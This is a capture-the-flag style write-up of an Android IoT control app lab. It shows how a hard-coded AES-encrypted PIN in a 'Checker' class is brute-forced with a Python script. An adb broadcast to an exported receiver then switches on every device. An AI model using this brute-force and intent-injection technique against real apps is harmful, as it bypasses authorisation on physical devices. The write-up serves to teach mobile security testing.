# IOT Connect 1. After we install The APK then we open it and register then login with our account 2. After the login we found that we can’t control all devices !!! ![image.png](https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2FiYIXMNGlybM8oF74Mwn2%2Fimage.png?alt=media) 3. Our Approach to Enable the Master switch let’s try to Use It
4. we don’t have any pin code 5. Let’s **Examine** **the AndroidManifest.xml Specific this activity `com.mobilehackinglab.iotconnect.MasterSwitchActivity`** * this code have some things : * First User cannot Control the Master Switch * Valid users must **enter a PIN** before enabling the switch. * THEN the app send intent to enable The Master Switch
6. Let’s examine the `BroadcastReceiver initialize` Class then we found that : It Will work when the Pin is correct
7. After Search in the code i found `Checker` Class
8. Here we have the Pin `OSnaALIWUkpOziVAMycaZQ==` and use AES Encryption hard Coded in our application , let’s create a script to decrypt it ```jsx from Crypto.Cipher import AES import base64 encrypted_text = 'OSnaALIWUkpOziVAMycaZQ==' # The base64 encoded string from the Java code def create_key_from_number(num): """ Create a 16-byte key from a number by converting it to a byte array and padding with zeros to ensure the key length is 16 bytes. """ key = str(num).encode('utf-8') # Convert number to bytes key = key.ljust(16, b'\0') # Pad the key to 16 bytes if it's shorter return key def attempt_decrypt(encrypted_text, key): """ Attempt to decrypt the encrypted text using the provided key. Returns the decrypted text if successful, or None if decryption fails. """ cipher = AES.new(key, AES.MODE_ECB) try: decrypted_bytes = cipher.decrypt(base64.b64decode(encrypted_text)) decrypted_text = decrypted_bytes.decode('utf-8').strip() return decrypted_text except (ValueError, UnicodeDecodeError): return None def brute_force_decrypt(encrypted_text): """ Brute-force attempt to find the correct key for AES decryption. Searches for a key that produces meaningful output, like "master_on". """ for num in range(1000): key = create_key_from_number(num) decrypted_text = attempt_decrypt(encrypted_text, key) if decrypted_text and "master_on" in decrypted_text: print(f"Decrypt success and the key is {num}") print(f"Decrypted text: {decrypted_text}") return print("No valid key found") # Start the brute-force decryption attempt brute_force_decrypt(encrypted_text) ```
9. Then we will call the broadcast receiver **`MasterReceiver`** with `MASTER_ON` action of the broadcast intent , `345` as key : `adb shell am broadcast -a MASTER_ON --ei key 345`
and here we done by Macking all Devices Turned on